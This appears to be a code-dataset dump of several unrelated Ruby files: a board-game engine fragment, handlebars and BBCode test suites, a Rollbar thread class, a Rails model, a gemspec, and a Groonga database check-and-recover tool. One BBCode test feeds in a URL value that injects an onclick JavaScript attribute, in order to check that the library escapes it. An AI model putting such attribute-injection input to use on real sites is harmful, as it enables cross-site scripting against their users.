def hex_crow_distance(start, finish)
dx = (start.x - finish.x).abs
dy = (start.y - finish.y).abs
dx + [0, (dy - dx) / 2].max
end
def buy_train(operator, train, price = nil)
@train_bought = true
super
end
def new_operating_round(round_num = 1)
@train_bought = false
super
end
def operating_round(round_num)
G18GB::Round::Operating.new(self, [
G18GB::Step::SpecialChoose,
Engine::Step::SpecialTrack,
G18GB::Step::SpecialToken,
Engine::Step::HomeToken,
G18GB::Step::TrackAndToken,
G18GB::Step::Route,
G18GB::Step::Dividend,
Engine::Step::DiscardTrain,
G18GB::Step::BuyTrain,
G18GB::Step::EMRShareBuying,
], round_num: round_num)
end
def or_round_finished
depot.export! unless @train_bought
end
def end_now?(after)
if @round.is_a?(round_end) && @depot.upcoming.size == 1 && !@train_bought
@depot.export!
return true
end
super
end
end
end
end
end
| 31.232222 | 128 | 0.524316 |
1cbc3d11a7eff0b0af9e8482e6ca0975b7ed9ffd | 1,063 | require 'spec_helper'
describe Guard::Handlebars::Formatter do
subject { Guard::Handlebars::Formatter }
describe '.info' do
it 'output Guard::UI.info' do
::Guard::UI.should_receive(:info).once.with('a.handlebars', {})
subject.info('a.handlebars')
end
end
describe '.debug' do
it 'output Guard::UI.debug' do
::Guard::UI.should_receive(:debug).once.with('a.handlebars', {})
subject.debug('a.handlebars')
end
end
describe '.error' do
it 'colorize Guard::UI.error' do
::Guard::UI.should_receive(:error).once.with("\e[0\e[31mma.handlebars\e[0m", {})
subject.error('a.handlebars')
end
end
describe '.success' do
it 'colorize Guard::UI.info' do
::Guard::UI.should_receive(:info).once.with("\e[0\e[32mma.handlebars\e[0m", {})
subject.success('a.handlebars')
end
end
describe '.notify' do
it 'output Guard::Notifier.notify' do
::Guard::Notifier.should_receive(:notify).once.with('a.handlebars', {})
subject.notify('a.handlebars')
end
end
end
| 24.72093 | 86 | 0.638758 |
215702ade7b63c336d12e4e2d56b7a30fecd8ddf | 14,288 | require 'test_helper'
class RubyBbcodeHtmlTest < Minitest::Test
def before_setup
RubyBBCode.reset
end
def test_multiline
assert_equal "line1<br />\nline2", "line1\nline2".bbcode_to_html
assert_equal "line1<br />\nline2", "line1\r\nline2".bbcode_to_html
assert_equal "<ul>\n<li>line1</li>\n<li>line2</li>\n</ul>", "[ul]\n[li]line1[/li]\n[li]line2[/li]\n[/ul]".bbcode_to_html
assert_equal "<strong><br />\nline 1<br />\nline 2</strong>", "[b]\nline 1\nline 2[/b]".bbcode_to_html
end
def test_strong
assert_equal '<strong>simple</strong>', '[b]simple[/b]'.bbcode_to_html
assert_equal "<strong>line 1<br />\nline 2</strong>", "[b]line 1\nline 2[/b]".bbcode_to_html
end
def test_em
assert_equal '<em>simple</em>', '[i]simple[/i]'.bbcode_to_html
assert_equal "<em>line 1<br />\nline 2</em>", "[i]line 1\nline 2[/i]".bbcode_to_html
end
def test_u
assert_equal '<u>simple</u>', '[u]simple[/u]'.bbcode_to_html
assert_equal "<u>line 1<br />\nline 2</u>", "[u]line 1\nline 2[/u]".bbcode_to_html
end
def test_code
assert_equal '<pre>simple</pre>', '[code]simple[/code]'.bbcode_to_html
assert_equal "<pre>line 1<br />\nline 2</pre>", "[code]line 1\nline 2[/code]".bbcode_to_html
end
def test_strikethrough
assert_equal '<span style="text-decoration:line-through;">simple</span>', '[s]simple[/s]'.bbcode_to_html
assert_equal "<span style=\"text-decoration:line-through;\">line 1<br />\nline 2</span>", "[s]line 1\nline 2[/s]".bbcode_to_html
end
def test_size
assert_equal '<span style="font-size: 32px;">32px Text</span>', '[size=32]32px Text[/size]'.bbcode_to_html
end
def test_color
assert_equal '<span style="color: red;">Red Text</span>', '[color=red]Red Text[/color]'.bbcode_to_html
assert_equal '<span style="color: #ff0023;">Hex Color Text</span>', '[color=#ff0023]Hex Color Text[/color]'.bbcode_to_html
end
def test_center
assert_equal '<div style="text-align:center;">centered</div>', '[center]centered[/center]'.bbcode_to_html
end
def test_ordered_list
assert_equal '<ol><li>item 1</li><li>item 2</li></ol>', '[ol][li]item 1[/li][li]item 2[/li][/ol]'.bbcode_to_html
end
def test_unordered_list
assert_equal '<ul><li>item 1</li><li>item 2</li></ul>', '[ul][li]item 1[/li][li]item 2[/li][/ul]'.bbcode_to_html
end
def test_list_common_syntax
assert_equal '<ul><li>item 1</li><li>item 2</li></ul>', '[list][*]item 1[*]item 2[/list]'.bbcode_to_html
assert_equal '<ul><li><strong>item 1</strong> test</li><li>item 2</li></ul>', '[list][*][b]item 1[/b] test[*]item 2[/list]'.bbcode_to_html
end
def test_newline_list_common_syntax
assert_equal "<ul>\n<li>item 1</li>\n<li>item 2</li>\n\n</ul>", "[list]\n[*]item 1\n[*]item 2\n\n[/list]".bbcode_to_html
end
def test_list_common_syntax_explicit_closing
assert_equal '<ul><li>item 1</li><li>item 2</li></ul>', '[list][*]item 1[/*][*]item 2[/*][/list]'.bbcode_to_html
end
def test_two_lists
assert_equal '<ul><li>item1</li><li>item2</li></ul><ul><li>item1</li><li>item2</li></ul>',
'[ul][li]item1[/li][li]item2[/li][/ul][ul][li]item1[/li][li]item2[/li][/ul]'.bbcode_to_html
end
def test_whitespace_in_only_allowed_tags
assert_equal "<ol>\n<li>item 1</li>\n<li>item 2</li>\n</ol>",
"[ol]\n[li]item 1[/li]\n[li]item 2[/li]\n[/ol]".bbcode_to_html
assert_equal "<ol> <li>item 1</li> <li>item 2</li>\t</ol>",
"[ol] [li]item 1[/li] [li]item 2[/li]\t[/ol]".bbcode_to_html
end
def test_quote
assert_equal '<div class="quote">quoting</div>', '[quote]quoting[/quote]'.bbcode_to_html
assert_equal "<div class=\"quote\">\nquoting\n</div>", "[quote]\nquoting\n[/quote]".bbcode_to_html
assert_equal "<div class=\"quote\">\nfirst line<br />\nsecond line\n</div>", "[quote]\nfirst line\nsecond line\n[/quote]".bbcode_to_html
assert_equal '<div class="quote"><strong>someone wrote:</strong>quoting</div>', '[quote=someone]quoting[/quote]'.bbcode_to_html
assert_equal '<div class="quote"><strong>Kitten wrote:</strong><div class="quote"><strong>creatiu wrote:</strong>f1</div>f2</div>',
'[quote=Kitten][quote=creatiu]f1[/quote]f2[/quote]'.bbcode_to_html
end
def test_link
assert_equal '<a href="http://www.google.com">http://www.google.com</a>', '[url]http://www.google.com[/url]'.bbcode_to_html
assert_equal '<a href="http://google.com">Google</a>', '[url=http://google.com]Google[/url]'.bbcode_to_html
assert_equal '<a href="http://google.com"><strong>Bold Google</strong></a>', '[url=http://google.com][b]Bold Google[/b][/url]'.bbcode_to_html
assert_equal '<a href="/index.html">Home</a>', '[url=/index.html]Home[/url]'.bbcode_to_html
end
def test_image
assert_equal '<img src="http://www.ruby-lang.org/images/logo.gif" alt="" />',
'[img]http://www.ruby-lang.org/images/logo.gif[/img]'.bbcode_to_html
assert_equal '<img src="http://www.ruby-lang.org/images/logo.gif" width="95" height="96" alt="" />',
'[img=95x96]http://www.ruby-lang.org/images/logo.gif[/img]'.bbcode_to_html
assert_equal '<img src="http://www.ruby-lang.org/images/logo.gif" width="123" height="456" alt="" />',
'[img width=123 height=456]http://www.ruby-lang.org/images/logo.gif[/img]'.bbcode_to_html
end
def test_youtube
assert_equal '<iframe id="player" type="text/html" width="400" height="320" src="http://www.youtube.com/embed/E4Fbk52Mk1w?enablejsapi=1" frameborder="0"></iframe>',
'[youtube]E4Fbk52Mk1w[/youtube]'.bbcode_to_html
assert_equal '<iframe id="player" type="text/html" width="640" height="480" src="http://www.youtube.com/embed/E4Fbk52Mk1w?enablejsapi=1" frameborder="0"></iframe>',
'[youtube width=640 height=480]E4Fbk52Mk1w[/youtube]'.bbcode_to_html
end
def test_youtube_with_full_url
full_url = 'http://www.youtube.com/watch?feature=player_embedded&v=E4Fbk52Mk1w'
assert_equal '<iframe id="player" type="text/html" width="400" height="320" src="http://www.youtube.com/embed/E4Fbk52Mk1w?enablejsapi=1" frameborder="0"></iframe>',
"[youtube]#{full_url}[/youtube]".bbcode_to_html
end
def test_youtube_with_url_shortener
full_url = 'http://www.youtu.be/cSohjlYQI2A'
assert_equal '<iframe id="player" type="text/html" width="400" height="320" src="http://www.youtube.com/embed/cSohjlYQI2A?enablejsapi=1" frameborder="0"></iframe>',
"[youtube]#{full_url}[/youtube]".bbcode_to_html
end
def test_html_escaping
assert_equal '<strong><i>foobar</i></strong>', '[b]<i>foobar</i>[/b]'.bbcode_to_html
assert_equal '<strong><i>foobar</i></strong>', '[b]<i>foobar</i>[/b]'.bbcode_to_html(false)
assert_equal '1 is < 2', '1 is < 2'.bbcode_to_html
assert_equal '1 is < 2', '1 is < 2'.bbcode_to_html(false)
assert_equal '2 is > 1', '2 is > 1'.bbcode_to_html
assert_equal '2 is > 1', '2 is > 1'.bbcode_to_html(false)
end
def test_uri_escaping
# There is no tag available, so create our own to test URI escaping
escape_param_def = {
escapequery: {
html_open: '<a href="%query%">%between%', html_close: '</a>',
require_between: true, allow_quick_param: false, allow_between_as_param: true,
param_tokens: [{ token: :query, uri_escape: true }]
}
}
assert_equal '<a href="Escaped+string+%28to+be+used+as+URL+%26+more%29">Escaped string (to be used as URL & more)</a>',
'[escapequery]Escaped string (to be used as URL & more)[/escapequery]'.bbcode_to_html(true, escape_param_def)
assert_equal '<a href="http%3A%3A%2Fwww.text.com%2Fpage.php%3Fparam1%3D1%26param2%3D2">http::/www.text.com/page.php?param1=1¶m2=2</a>',
'[escapequery]http::/www.text.com/page.php?param1=1¶m2=2[/escapequery]'.bbcode_to_html(true, escape_param_def)
end
def test_disable_tags
assert_equal '[b]foobar[/b]', '[b]foobar[/b]'.bbcode_to_html(true, {}, :disable, :b)
assert_equal '[b]<em>foobar</em>[/b]', '[b][i]foobar[/i][/b]'.bbcode_to_html(true, {}, :disable, :b)
assert_equal '[b][i]foobar[/i][/b]', '[b][i]foobar[/i][/b]'.bbcode_to_html(true, {}, :disable, :b, :i)
end
def test_enable_tags
assert_equal '<strong>foobar</strong>', '[b]foobar[/b]'.bbcode_to_html(true, {}, :enable, :b)
assert_equal '<strong>[i]foobar[/i]</strong>', '[b][i]foobar[/i][/b]'.bbcode_to_html(true, {}, :enable, :b)
assert_equal '<strong><em>foobar</em></strong>', '[b][i]foobar[/i][/b]'.bbcode_to_html(true, {}, :enable, :b, :i)
end
def test_to_html_bang_method
foo = '[b]foobar[/b]'
assert_equal '<strong>foobar</strong>', foo.bbcode_to_html!
assert_equal '<strong>foobar</strong>', foo
end
def test_addition_of_tags
mydef = {
test: {
html_open: '<test>', html_close: '</test>',
description: 'This is a test',
example: '[test]Test here[/test]'
}
}
assert_equal 'pre <test>Test here</test> post', 'pre [test]Test here[/test] post'.bbcode_to_html(true, mydef)
assert_equal 'pre <strong><test>Test here</test></strong> post', 'pre [b][test]Test here[/test][/b] post'.bbcode_to_html(true, mydef)
end
def test_multiple_tag_test
assert_equal '<strong>bold</strong><em>italic</em><u>underline</u><div class="quote">quote</div><a href="https://test.com">link</a>',
'[b]bold[/b][i]italic[/i][u]underline[/u][quote]quote[/quote][url=https://test.com]link[/url]'.bbcode_to_html
end
def test_no_xss_hax
expected = "<a href=\"http://www.google.com" onclick=\"javascript:alert\">google</a>"
assert_equal expected, '[url=http://www.google.com" onclick="javascript:alert]google[/url]'.bbcode_to_html
end
def test_media_tag
input1 = '[media]http://www.youtube.com/watch?v=cSohjlYQI2A[/media]'
input2 = '[media]http://vimeo.com/46141955[/media]'
output1 = '<iframe id="player" type="text/html" width="400" height="320" src="http://www.youtube.com/embed/cSohjlYQI2A?enablejsapi=1" frameborder="0"></iframe>'
output2 = '<iframe src="http://player.vimeo.com/video/46141955?badge=0" width="400" height="320" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe>'
assert_equal output1, input1.bbcode_to_html
assert_equal output2, input2.bbcode_to_html
end
def test_vimeo_tag
input = '[vimeo]http://vimeo.com/46141955[/vimeo]'
input2 = '[vimeo]46141955[/vimeo]'
output = '<iframe src="http://player.vimeo.com/video/46141955?badge=0" width="400" height="320" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe>'
assert_equal output, input.bbcode_to_html
assert_equal output, input2.bbcode_to_html
assert_equal '<iframe src="http://player.vimeo.com/video/46141955?badge=0" width="640" height="480" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe>',
'[vimeo width=640 height=480]46141955[/vimeo]'.bbcode_to_html
end
def test_unknown_tag
RubyBBCode.configuration.ignore_unknown_tags = :exception
assert_raises RuntimeError do
'[unknown]This is an unknown tag[/unknown]'.bbcode_to_html
end
RubyBBCode.configuration.ignore_unknown_tags = :ignore
assert_equal 'This is an unknown tag', '[unknown]This is an unknown tag[/unknown]'.bbcode_to_html
RubyBBCode.configuration.ignore_unknown_tags = :text
assert_equal '[unknown]This is an unknown tag[/unknown]', '[unknown]This is an unknown tag[/unknown]'.bbcode_to_html
end
def test_raised_exceptions
# Test whether exceptions are raised when the BBCode contains errors
assert_raises RuntimeError do
'this [b]should raise an exception'.bbcode_to_html
end
assert_raises RuntimeError do
'[ul][li]item 1[li]item 2[/ul]'.bbcode_to_html
end
end
def test_uppercase
assert_equal '<strong>simple</strong>', '[B]simple[/B]'.bbcode_to_html
assert_equal "<strong>line 1<br />\nline 2</strong>", "[B]line 1\nline 2[/B]".bbcode_to_html
end
def test_uppercase_with_params
assert_equal '<span style="font-size: 4px;">simple</span>', '[SIZE=4]simple[/SIZE]'.bbcode_to_html
assert_equal "<span style=\"font-size: 4px;\">line 1<br />\nline 2</span>", "[SIZE=4]line 1\nline 2[/SIZE]".bbcode_to_html
end
def test_uppercase_at_tag_open
assert_equal '<strong>simple</strong>', '[B]simple[/b]'.bbcode_to_html
assert_equal "<strong>line 1<br />\nline 2</strong>", "[B]line 1\nline 2[/b]".bbcode_to_html
end
def test_uppercase_at_tag_close
assert_equal '<strong>simple</strong>', '[b]simple[/B]'.bbcode_to_html
assert_equal "<strong>line 1<br />\nline 2</strong>", "[b]line 1\nline 2[/B]".bbcode_to_html
end
def test_nested_uppercase_tags
assert_equal '<ul><li>item 1</li><li>item 2</li></ul>', '[UL][LI]item 1[/LI][LI]item 2[/LI][/UL]'.bbcode_to_html
assert_equal "<ul><li>line 1<br />\nline 2</li><li>line 1<br />\nline 2</li></ul>", "[UL][LI]line 1\nline 2[/LI][LI]line 1\nline 2[/LI][/UL]".bbcode_to_html
end
def test_parent_uppercase_in_nested_tags
assert_equal '<ul><li>item 1</li><li>item 2</li></ul>', '[UL][li]item 1[/li][li]item 2[/li][/UL]'.bbcode_to_html
assert_equal "<ul><li>line 1<br />\nline 2</li><li>line 1<br />\nline 2</li></ul>", "[UL][li]line 1\nline 2[/li][li]line 1\nline 2[/li][/UL]".bbcode_to_html
end
# Checking the HTML output is the only way to see whether a tag is recognized
# The BBCode validity test ignores unknown tags (and treats them as text)
def test_modified_taglist
assert_equal '<strong>simple</strong>', '[b]simple[/b]'.bbcode_to_html
tags = RubyBBCode::Tags.tag_list
b_tag = tags.delete :b
begin
# Make sure we captured the contents of the b-tag
assert b_tag.instance_of? Hash
# Now no HTML is generated, as the tag is removed
assert_equal '[b]simple[/b]', '[b]simple[/b]'.bbcode_to_html
ensure
# Always restore as this change is permanent (and messes with other tests)
tags[:b] = b_tag
end
# Restored to the original/correct situation
assert_equal '<strong>simple</strong>', '[b]simple[/b]'.bbcode_to_html
end
end
| 48.931507 | 188 | 0.672172 |
26dd3830f2d32ef826b9d3764d76dbc777cd25f1 | 1,798 | require 'thread'
require 'timeout'
module Rollbar
module Delay
class Thread
EXIT_SIGNAL = :exit
EXIT_TIMEOUT = 3
Error = Class.new(StandardError)
TimeoutError = Class.new(Error)
class << self
attr_reader :reaper
def call(payload)
spawn_threads_reaper
thread = new.call(payload)
threads << thread
thread
end
private
def threads
@threads ||= Queue.new
end
def spawn_threads_reaper
return if @spawned
@spawned = true
@reaper ||= build_reaper_thread
configure_exit_handler
end
def build_reaper_thread
::Thread.start do
loop do
thread = threads.pop
break if thread == EXIT_SIGNAL
thread.join
end
end
end
def configure_exit_handler
at_exit do
begin
Timeout.timeout(EXIT_TIMEOUT) do
threads << EXIT_SIGNAL
reaper.join
end
rescue Timeout::Error
raise TimeoutError, "unable to reap all threads within #{EXIT_TIMEOUT} seconds"
end
end
end
end # class << self
def call(payload)
::Thread.new do
begin
Rollbar.process_from_async_handler(payload)
rescue
# Here we swallow the exception:
# 1. The original report wasn't sent.
# 2. An internal error was sent and logged
#
# If users want to handle this in some way they
# can provide a more custom Thread based implementation
end
end
end
end
end
end
| 22.197531 | 93 | 0.521691 |
d576fd8c293951a4314341de809254f56ae1a8f5 | 649 | # == Schema Information
#
# Table name: professors
#
# id :integer not null, primary key
# first :string
# last :string
# university :string
# created_at :datetime not null
# updated_at :datetime not null
#
class Professor < ActiveRecord::Base
has_many :ratings, dependent: :destroy
accepts_nested_attributes_for :ratings, reject_if: lambda { |attributes| attributes['course'].blank? || attributes['comment'].blank? || attributes['rating'].blank?}
validates :first, presence: true
validates :last, presence: true
validates :university, presence: true
def name
first + ' ' + last
end
end
| 25.96 | 165 | 0.676425 |
e9b9aaa7a78de63cb841c95741a2a07ec509ca7f | 1,809 |
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "gametracker/version"
Gem::Specification.new do |spec|
spec.name = "gametracker"
spec.version = Gametracker::VERSION
spec.authors = ["'Ali Karimi'"]
spec.email = ["'[email protected]'"]
spec.summary = %q{TODO: Write a short summary, because RubyGems requires one.}
spec.description = %q{TODO: Write a longer description or delete this line.}
spec.homepage = "TODO: Put your gem's website or public repo URL here."
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
if spec.respond_to?(:metadata)
spec.metadata["allowed_push_host"] = "TODO: Set to 'http://mygemserver.com'"
spec.metadata["homepage_uri"] = spec.homepage
spec.metadata["source_code_uri"] = "TODO: Put your gem's public repo URL here."
spec.metadata["changelog_uri"] = "TODO: Put your gem's CHANGELOG.md URL here."
else
raise "RubyGems 2.0 or newer is required to protect against " \
"public gem pushes."
end
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 2.0"
spec.add_development_dependency "rake", "~> 10.0"
end
| 43.071429 | 96 | 0.673853 |
e9f8a47886cf618eeec2eb889c897d3d252a0b0d | 420 | class BenchmarkChannel < ApplicationCable::Channel
STREAMS = (1..10).to_a
def subscribed
Rails.logger.info "a client subscribed: #{id}"
stream_from "all#{STREAMS.sample if ENV['SAMPLED']}"
end
def echo(data)
transmit data
end
def broadcast(data)
ActionCable.server.broadcast "all#{STREAMS.sample if ENV['SAMPLED']}", data
data["action"] = "broadcastResult"
transmit data
end
end
| 22.105263 | 79 | 0.690476 |
f8a61762ca1d1f973528ea27bb1bb9e3a7bdc622 | 4,030 | #encoding: utf-8
class Option
include Comparable
TYPES = ["*", "bool", "float", "[float]", "int", "string", "[string]", "table", "[table]"]
attr_reader :name,
:category,
:default,
:description,
:display,
:enum,
:examples,
:null,
:options,
:partition_key,
:relevant_when,
:templateable,
:type,
:unit
def initialize(hash)
# Options can have sub-options (tables)
options_hashes = hash["options"]
if !options_hashes.nil?
@options =
options_hashes.collect do |sub_name, sub_hash|
self.class.new(sub_hash.merge("name" => sub_name))
end
else
@options = []
end
@name = hash.fetch("name")
@default = hash["default"]
@display = hash["display"]
@description = hash.fetch("description")
@enum = hash["enum"]
@examples = hash["examples"] || []
@null = hash.fetch("null")
@partition_key = hash["partition_key"] == true
@relevant_when = hash["relevant_when"]
@simple = hash["simple"] == true
@templateable = hash["templateable"] == true
@type = hash.fetch("type")
@unit = hash["unit"]
@category = hash["category"] || ((@options.empty? || inline?) ? "General" : @name.humanize)
if [email protected]_a?(TrueClass) && [email protected]_a?(FalseClass)
raise ArgumentError.new("#{self.class.name}#null must be a boolean")
end
if !@relevant_when.nil? && !@relevant_when.is_a?(Hash)
raise ArgumentError.new("#{self.class.name}#null must be a hash of conditions")
end
if !TYPES.include?(@type)
raise "#{self.class.name}#type must be one of #{TYPES.to_sentence} for #{@name}, you passed: #{@type}"
end
if @examples.empty?
if [email protected]?
@examples = @enum.keys
elsif [email protected]?
@examples = [@default]
end
end
if @examples.empty? && @options.empty? && !table?
raise "#{self.class.name}#examples is required if a #default is not specified for #{@name}"
end
if wildcard?
if [email protected]? { |example| example.is_a?(Hash) }
raise "#{self.class.name}#examples must be a hash with name/value keys when the name is \"*\""
end
end
end
def <=>(other_option)
name <=> other_option.name
end
def advanced?
if options.any?
options.any?(&:advanced?)
else
!simple?
end
end
def array?(inner_type)
type == "[#{inner_type}]"
end
def config_file_sort_token
first =
if table?
2
elsif required?
0
else
1
end
second =
case category
when "General"
"AA #{category}"
when "Requests"
"ZZ #{category}"
else
category
end
third =
case name
when "inputs"
"AAB #{name}"
when "strategy", "type"
"AAA #{name}"
else
name
end
[first, second, third]
end
def context?
category.downcase == "context"
end
def get_relevant_sections(sections)
sections.select do |section|
section.referenced_options.include?(name) ||
section.referenced_options.any? { |o| o.end_with?(name) }
end
end
def human_default
"#{default} #{unit}"
end
def inline?
display == "inline"
end
def optional?
!required?
end
def partition_key?
partition_key == true
end
def relevant_when_kvs
relevant_when.collect do |k, v|
if v.is_a?(Array)
v.collect do |sub_v|
"#{k} = #{sub_v.to_toml}"
end
else
"#{k} = #{v.to_toml}"
end
end.flatten
end
def required?
default.nil? && null == false
end
def simple?
if options.any?
@simple == true || (required? && simple_options.any?)
else
@simple == true || required?
end
end
def simple_options
@simple_options ||= options.select(&:simple?)
end
def table?
type == "table"
end
def templateable?
templateable == true
end
def wildcard?
name == "*"
end
end | 20.353535 | 108 | 0.572953 |
5d3946f2609f647ef4b70d0de902d1ea13d252ff | 366 | require 'celluloid'
require 'pry'
class File_Access
include Celluloid
def open_file (aFile, bFile)
aFile.lock_file
end
def lock_file
@f1 = File.open('/Users/dilum/Desktop/input.txt', File::RDWR|File::CREAT, 0644)
@f1.flock(File::LOCK_EX)
@f1.close
end
end
a = File_Access.new
b = File_Access.new
a.async.open_file(a,b)
a.open_file(b,a)
a.lock_file | 15.25 | 81 | 0.724044 |
edd16d588cd969ae35643fc59eb43eb4e1f491f7 | 13,589 | module Groonga
module CommandLine
class Grndb
def initialize(argv)
@program_path, *@arguments = argv
@succeeded = true
@database_path = nil
end
def run
command_line_parser = create_command_line_parser
options = nil
begin
options = command_line_parser.parse(@arguments)
rescue Slop::Error => error
$stderr.puts(error.message)
$stderr.puts
$stderr.puts(command_line_parser.help_message)
return false
end
@succeeded
end
private
def create_command_line_parser
program_name = File.basename(@program_path)
parser = CommandLineParser.new(program_name)
parser.add_command("check") do |command|
command.description = "Check database"
options = command.options
options.banner += " DB_PATH"
options.string("--target", "Check only the target object.")
command.add_action do |options|
open_database(command, options) do |database, rest_arguments|
check(database, options, rest_arguments)
end
end
end
parser.add_command("recover") do |command|
command.description = "Recover database"
options = command.options
options.banner += " DB_PATH"
options.boolean("--force-truncate", "Force to truncate corrupted objects.")
command.add_action do |options|
open_database(command, options) do |database, rest_arguments|
recover(database, options, rest_arguments)
end
end
end
parser
end
def open_database(command, options)
arguments = options.arguments
if arguments.empty?
$stderr.puts("Database path is missing")
$stderr.puts
$stderr.puts(command.help_message)
@succeesed = false
return
end
database = nil
@database_path, *rest_arguments = arguments
begin
database = Database.open(@database_path)
rescue Error => error
$stderr.puts("Failed to open database: <#{@database_path}>")
$stderr.puts(error.message)
@succeeded = false
return
end
begin
yield(database, rest_arguments)
ensure
database.close
end
end
def failed(*messages)
messages.each do |message|
$stderr.puts(message)
end
@succeeded = false
end
def recover(database, options, arguments)
recoverer = Recoverer.new
recoverer.database = database
recoverer.force_truncate = options[:force_truncate]
begin
recoverer.recover
rescue Error => error
failed("Failed to recover database: <#{@database_path}>",
error.message)
end
end
def check(database, options, arguments)
checker = Checker.new
checker.program_path = @program_path
checker.database_path = @database_path
checker.database = database
checker.on_failure = lambda do |message|
failed(message)
end
checker.check_database
target_name = options[:target]
if target_name
checker.check_one(target_name)
else
checker.check_all
end
end
class Checker
attr_writer :program_path
attr_writer :database_path
attr_writer :database
attr_writer :on_failure
def initialize
@context = Context.instance
@checked = {}
end
def check_database
check_database_orphan_inspect
check_database_locked
check_database_corrupt
check_database_dirty
end
def check_one(target_name)
target = @context[target_name]
if target.nil?
exist_p = open_database_cursor do |cursor|
cursor.any? do
cursor.key == target_name
end
end
if exist_p
failed_to_open(target_name)
else
message = "[#{target_name}] Not exist."
failed(message)
end
return
end
check_object_recursive(target)
end
def check_all
open_database_cursor do |cursor|
cursor.each do |id|
next if ID.builtin?(id)
next if builtin_object_name?(cursor.key)
next if @context[id]
failed_to_open(cursor.key)
end
end
@database.each do |object|
check_object(object)
end
end
private
def check_database_orphan_inspect
open_database_cursor do |cursor|
cursor.each do |id|
if cursor.key == "inspect" and @context[id].nil?
message =
"Database has orphan 'inspect' object. " +
"Remove it by '#{@program_path} recover #{@database_path}'."
failed(message)
break
end
end
end
end
def check_database_locked
return unless @database.locked?
message =
"Database is locked. " +
"It may be broken. " +
"Re-create the database."
failed(message)
end
def check_database_corrupt
return unless @database.corrupt?
message =
"Database is corrupt. " +
"Re-create the database."
failed(message)
end
def check_database_dirty
return unless @database.dirty?
last_modified = @database.last_modified
if File.stat(@database.path).mtime > last_modified
return
end
open_database_cursor do |cursor|
cursor.each do |id|
next if ID.builtin?(id)
path = "%s.%07x" % [@database.path, id]
next unless File.exist?(path)
return if File.stat(path).mtime > last_modified
end
end
message =
"Database wasn't closed successfully. " +
"It may be broken. " +
"Re-create the database."
failed(message)
end
def check_object(object)
return if @checked.key?(object.id)
@checked[object.id] = true
check_object_locked(object)
check_object_corrupt(object)
end
def check_object_locked(object)
case object
when IndexColumn
return unless object.locked?
message =
"[#{object.name}] Index column is locked. " +
"It may be broken. " +
"Re-create index by '#{@program_path} recover #{@database_path}'."
failed(message)
when Column
return unless object.locked?
name = object.name
message =
"[#{name}] Data column is locked. " +
"It may be broken. " +
"(1) Truncate the column (truncate #{name}) or " +
"clear lock of the column (lock_clear #{name}) " +
"and (2) load data again."
failed(message)
when Table
return unless object.locked?
name = object.name
message =
"[#{name}] Table is locked. " +
"It may be broken. " +
"(1) Truncate the table (truncate #{name}) or " +
"clear lock of the table (lock_clear #{name}) " +
"and (2) load data again."
failed(message)
end
end
def check_object_corrupt(object)
case object
when IndexColumn
return unless object.corrupt?
message =
"[#{object.name}] Index column is corrupt. " +
"Re-create index by '#{@program_path} recover #{@database_path}'."
failed(message)
when Column
return unless object.corrupt?
name = object.name
message =
"[#{name}] Data column is corrupt. " +
"(1) Truncate the column (truncate #{name} or " +
"'#{@program_path} recover --force-truncate #{@database_path}') " +
"and (2) load data again."
failed(message)
when Table
return unless object.corrupt?
name = object.name
message =
"[#{name}] Table is corrupt. " +
"(1) Truncate the table (truncate #{name} or " +
"'#{@program_path} recover --force-truncate #{@database_path}') " +
"and (2) load data again."
failed(message)
end
end
def check_object_recursive(target)
return if @checked.key?(target.id)
check_object(target)
case target
when Table
unless target.is_a?(Groonga::Array)
domain_id = target.domain_id
domain = @context[domain_id]
if domain.nil?
record = Record.new(@database, domain_id)
failed_to_open(record.key)
elsif domain.is_a?(Table)
check_object_recursive(domain)
end
end
target.column_ids.each do |column_id|
column = @context[column_id]
if column.nil?
record = Record.new(@database, column_id)
failed_to_open(record.key)
else
check_object_recursive(column)
end
end
when FixedSizeColumn, VariableSizeColumn
range_id = target.range_id
range = @context[range_id]
if range.nil?
record = Record.new(@database, range_id)
failed_to_open(record.key)
elsif range.is_a?(Table)
check_object_recursive(range)
end
lexicon_ids = []
target.indexes.each do |index_info|
index = index_info.index
lexicon_ids << index.domain_id
check_object(index)
end
lexicon_ids.uniq.each do |lexicon_id|
lexicon = @context[lexicon_id]
if lexicon.nil?
record = Record.new(@database, lexicon_id)
failed_to_open(record.key)
else
check_object(lexicon)
end
end
when IndexColumn
range_id = target.range_id
range = @context[range_id]
if range.nil?
record = Record.new(@database, range_id)
failed_to_open(record.key)
return
end
check_object(range)
target.source_ids.each do |source_id|
source = @context[source_id]
if source.nil?
record = Record.new(database, source_id)
failed_to_open(record.key)
elsif source.is_a?(Column)
check_object_recursive(source)
end
end
end
end
def open_database_cursor(&block)
flags =
TableCursorFlags::ASCENDING |
TableCursorFlags::BY_ID
TableCursor.open(@database, :flags => flags, &block)
end
def builtin_object_name?(name)
case name
when "inspect"
# Just for compatibility. It's needed for users who used
# Groonga master at between 2016-02-03 and 2016-02-26.
true
else
false
end
end
def failed(message)
@on_failure.call(message)
end
def failed_to_open(name)
message =
"[#{name}] Can't open object. " +
"It's broken. " +
"Re-create the object or the database."
failed(message)
end
end
class Recoverer
attr_writer :database
attr_writer :force_truncate
def initialize
@context = Context.instance
end
def recover
if @force_truncate
truncate_corrupt_objects
end
@database.recover
end
def truncate_corrupt_objects
@database.each do |object|
next unless object.corrupt?
logger = @context.logger
object_path = object.path
object_dirname = File.dirname(object_path)
object_basename = File.basename(object_path)
object.truncate
Dir.foreach(object_dirname) do |path|
if path.start_with?("#{object_basename}.")
begin
File.unlink("#{object_dirname}/#{path}")
message = "Corrupted <#{object_path}> related file is removed: <#{path}>"
$stdout.puts(message)
logger.log(Logger::Level::INFO.to_i, __FILE__, __LINE__, "truncate_corrupt_objects", message)
rescue Error => error
